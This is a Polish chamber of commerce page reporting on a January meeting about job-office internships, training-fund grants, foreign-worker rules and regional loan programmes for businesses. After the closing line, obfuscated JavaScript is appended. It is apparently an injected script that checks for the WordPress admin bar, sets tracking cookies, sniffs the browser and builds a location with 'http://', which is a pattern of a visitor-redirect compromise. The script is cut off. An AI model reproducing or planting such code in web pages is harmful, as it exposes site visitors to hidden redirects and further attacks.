Relacja i materiały ze spotkania: „Wsparcie finansowe i kadrowe dla firm”. | Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo,

we wtorek 30 stycznia w restauracji Maredo, odbyło się pierwsze w tym roku spotkanie informacyjne pt. „Wsparcie finansowe i kadrowe dla przedsiębiorców”. Na spotkaniu zostały przedstawione zagadnienia dotyczące możliwości wsparcia dla przedsiębiorców z Urzędu Pracy w Koszalinie oraz oferty dofinansowań i pożyczek z Koszalińskiej Agencji Rozwoju Regionalnego. Polnocna-Izba-wspracie-dla-firm

Przedsiębiorcy mogą skorzystać przy zatrudnianiu pracowników między innymi ze staży – więcej informacji oraz dokumenty do wypełnienia na www.pup.koszalin.pl/pracodawcy_przedsiebiorcy/staze.html oraz prac interwencyjnych www.pup.koszalin.pl/pracodawcy_przedsiebiorcy/prace_interwencyjne.html

Drugim zagadnieniem były realizacje Krajowego Funduszu Szkoleniowego na rok 2018. Powiatowe urzędy pracy mogą przeznaczyć środki KFS na finansowanie działań obejmujących kształcenie ustawiczne pracowników i pracodawcy, na które składają się:

  • kursy i studia podyplomowe realizowane z inicjatywy pracodawcy lub za jego zgodą,
  • egzaminy umożliwiające uzyskanie dokumentów potwierdzających nabycie umiejętności, kwalifikacji lub uprawnień zawodowych,
  • badania lekarskie i psychologiczne wymagane do podjęcia kształcenia lub pracy zawodowej po ukończonym kształceniu,
  • ubezpieczenie od następstw nieszczęśliwych wypadków w związku z podjętym kształceniem,
  • określenie potrzeb pracodawcy w zakresie kształcenia ustawicznego, w związku z ubieganiem się o sfinansowanie tego kształcenia ze środków KFS.

 

Dodatkowe informacje oraz formularze do pobrania pod adresem http://www.pup.koszalin.pl/pracodawcy_przedsiebiorcy/krajowy_fundusz_szkoleniowy.html

Dodatkowo zostało poruszone zagadnienie z zakresu zmian w zatrudnianiu cudzoziemców od 1 stycznia 2018. Więcej informacji na stronie http://www.pup.koszalin.pl/pracodawcy_przedsiebiorcy/informacje_o_zatrudnianiu_cudzoziemcow_spoza_ue_i_eog.html

Następnie została przedstawiona oferta Koszalińskiej Agencji Rozwoju Regionalnego dotyczącą możliwości dofinansowania do 80% na usługi szkoleniowe oraz doradcze takich jak np.: szkolenia, studia podyplomowe, e-learning, kursy zawodowe, egzaminy a nawet mentoring.

Więcej informacji na stronie www.karrsa.eu

Poniżej materiały do pobrania z prezentacji:

Prezentacja KARR

Na zakończenie spotkania Pani Małgorzata Robak z KARR-u przedstawiła ofertę pożyczek dla firm z programy JEREMIE. Informacje ze spotkania do pobrania: Fundusze Jeremie

Lista aktualnych form wsparcia w Urzędzie Pracy pod adresem http://www.pup.koszalin.pl/pracodawcy_przedsiebiorcy/formy_wsparcia_dla_pracodawcow_i_przedsiebiorcow.html

Informacje o dofinansowaniach na szkolenia z KARR-u pod adresem http://karrsa.eu/kategoria/szkolenie/szkolenia-aktualne-szkolenie/  oraz o niskooprocentowanych pożyczkach http://karrsa.eu/fundusz-pozyczkowy-jeremie/

Bardzo  dziękujemy za tak liczny udział i zapraszamy już 21 lutego na spotkanie z korzyści z zatrudnia osób z niepełnosprawnościami!

Do zobaczenia 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m